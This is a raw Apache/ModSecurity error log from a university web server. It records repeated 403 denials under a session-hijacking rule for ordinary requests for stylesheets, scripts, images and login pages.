[Mon Aug 28 07:44:38.648858 2023] [:error] [pid 37539] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvt9sCo-f0AAJKjZx0AAAAG"]
[Mon Aug 28 07:44:38.686589 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvt9sCo-f0AAJPUAh8AAAAA"]
[Mon Aug 28 07:44:38.712455 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvt9sCo-f0AAJSENY0AAAAH"]
[Mon Aug 28 07:44:38.715469 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvt9sCo-f0AAJOr9sMAAAAL"]
[Mon Aug 28 07:44:39.015314 2023] [:error] [pid 37844] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvt98Co-f0AAJPUAiAAAAAA"]
[Mon Aug 28 07:44:39.015796 2023] [:error] [pid 37916] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvt98Co-f0AAJQcJ1cAAAAF"]
[Mon Aug 28 07:44:39.018781 2023] [:error] [pid 37616] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvt98Co-f0AAJLwYR8AAAAB"]
[Mon Aug 28 07:44:39.019070 2023] [:error] [pid 37539] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvt98Co-f0AAJKjZx4AAAAG"]
[Mon Aug 28 07:44:39.019267 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvt98Co-f0AAJOr9sQAAAAL"]
[Mon Aug 28 07:44:39.021138 2023] [:error] [pid 38020] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvt98Co-f0AAJSENY4AAAAH"]
[Mon Aug 28 07:44:39.774977 2023] [:error] [pid 37803] [client 125.162.212.100] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvt98Co-f0AAJOr9sUAAAAL"]
[Mon Aug 28 07:44:47.595083 2023] [:error] [pid 37882] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvt-8Co-f0AAJP6BOAAAAAM"]
[Mon Aug 28 07:44:47.825604 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvt-8Co-f0AAJSIdwAAAAAK"]
[Mon Aug 28 07:45:04.811575 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvuEMCo-f0AAJSIdwMAAAAK"]
[Mon Aug 28 07:45:04.972147 2023] [:error] [pid 37916] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuEMCo-f0AAJQcJ1sAAAAF"]
[Mon Aug 28 07:45:10.968431 2023] [:error] [pid 37803] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvuFsCo-f0AAJOr9swAAAAL"]
[Mon Aug 28 07:45:10.986627 2023] [:error] [pid 37882] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvuFsCo-f0AAJP6BOYAAAAM"]
[Mon Aug 28 07:45:10.996525 2023] [:error] [pid 37539] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvuFsCo-f0AAJKjZyUAAAAG"]
[Mon Aug 28 07:45:11.007580 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvuF8Co-f0AAJSIdwQAAAAK"]
[Mon Aug 28 07:45:11.016696 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvuF8Co-f0AAJQeRiAAAAAP"]
[Mon Aug 28 07:45:11.027727 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvuF8Co-f0AAJQcJ10AAAAF"]
[Mon Aug 28 07:45:11.067599 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvuF8Co-f0AAJSENZUAAAAH"]
[Mon Aug 28 07:45:11.076752 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvuF8Co-f0AAJQeRiEAAAAP"]
[Mon Aug 28 07:45:11.099790 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvuF8Co-f0AAJSIdwUAAAAK"]
[Mon Aug 28 07:45:11.120498 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvuF8Co-f0AAJQdMTMAAAAJ"]
[Mon Aug 28 07:45:11.148630 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvuF8Co-f0AAJQcJ14AAAAF"]
[Mon Aug 28 07:45:11.158690 2023] [:error] [pid 37803] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvuF8Co-f0AAJOr9s0AAAAL"]
[Mon Aug 28 07:45:11.168711 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvuF8Co-f0AAJSENZYAAAAH"]
[Mon Aug 28 07:45:11.178151 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvuF8Co-f0AAJLwYSYAAAAB"]
[Mon Aug 28 07:45:11.186961 2023] [:error] [pid 37539] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvuF8Co-f0AAJKjZyYAAAAG"]
[Mon Aug 28 07:45:11.200632 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvuF8Co-f0AAJQeRiIAAAAP"]
[Mon Aug 28 07:45:11.228505 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvuF8Co-f0AAJQdMTQAAAAJ"]
[Mon Aug 28 07:45:11.248319 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvuF8Co-f0AAJSIdwYAAAAK"]
[Mon Aug 28 07:45:11.256761 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvuF8Co-f0AAJSENZcAAAAH"]
[Mon Aug 28 07:45:11.256847 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvuF8Co-f0AAJLwYScAAAAB"]
[Mon Aug 28 07:45:11.268034 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvuF8Co-f0AAJQcJ18AAAAF"]
[Mon Aug 28 07:45:11.297210 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvuF8Co-f0AAJQdMTUAAAAJ"]
[Mon Aug 28 07:45:11.307574 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvuF8Co-f0AAJSENZgAAAAH"]
[Mon Aug 28 07:45:11.326864 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvuF8Co-f0AAJLwYSgAAAAB"]
[Mon Aug 28 07:45:11.326944 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvuF8Co-f0AAJSIdwcAAAAK"]
[Mon Aug 28 07:45:11.347657 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvuF8Co-f0AAJQcJ2AAAAAF"]
[Mon Aug 28 07:45:11.546968 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvuF8Co-f0AAJLwYSkAAAAB"]
[Mon Aug 28 07:45:11.667889 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuF8Co-f0AAJSENZkAAAAH"]
[Mon Aug 28 07:45:39.328518 2023] [:error] [pid 38061] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuM8Co-f0AAJSt5TMAAAAR"]
[Mon Aug 28 07:45:39.621364 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuM8Co-f0AAJSIdw8AAAAK"]
[Mon Aug 28 07:45:54.609061 2023] [:error] [pid 38059] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuQsCo-f0AAJSr2dUAAAAO"]
[Mon Aug 28 07:45:54.837515 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuQsCo-f0AAJSIdxEAAAAK"]
[Mon Aug 28 07:46:31.283254 2023] [:error] [pid 37616] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuZ8Co-f0AAJLwYTgAAAAB"]
[Mon Aug 28 07:46:31.548650 2023] [:error] [pid 38021] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuZ8Co-f0AAJSFI6oAAAAI"]
[Mon Aug 28 07:46:43.318912 2023] [:error] [pid 38064] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvuc8Co-f0AAJSw6ZUAAAAU"]
[Mon Aug 28 07:46:43.352239 2023] [:error] [pid 38023] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvuc8Co-f0AAJSHtcEAAAAD"]
[Mon Aug 28 07:46:43.358746 2023] [:error] [pid 38063] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvuc8Co-f0AAJSvom0AAAAT"]
[Mon Aug 28 07:46:43.390727 2023] [:error] [pid 38060] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvuc8Co-f0AAJSsrOUAAAAQ"]
[Mon Aug 28 07:46:43.499127 2023] [:error] [pid 38061] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuc8Co-f0AAJSt5UAAAAAR"]
[Mon Aug 28 07:46:48.703164 2023] [:error] [pid 38059] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvueMCo-f0AAJSr2d0AAAAO"]
[Mon Aug 28 07:46:48.978759 2023] [:error] [pid 38062] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvueMCo-f0AAJSuHrgAAAAS"]
[Mon Aug 28 07:46:58.878650 2023] [:error] [pid 38021] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvugsCo-f0AAJSFI7EAAAAI"]
[Mon Aug 28 07:46:58.979544 2023] [:error] [pid 38021] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvugsCo-f0AAJSFI7IAAAAI"]
[Mon Aug 28 07:47:00.204044 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvuhMCo-f0AAJSyp1UAAAAM"]
[Mon Aug 28 07:47:00.262005 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvuhMCo-f0AAJSyp1YAAAAM"]
[Mon Aug 28 07:47:00.281287 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvuhMCo-f0AAJSyp1cAAAAM"]
[Mon Aug 28 07:47:00.291761 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvuhMCo-f0AAJSyp1gAAAAM"]
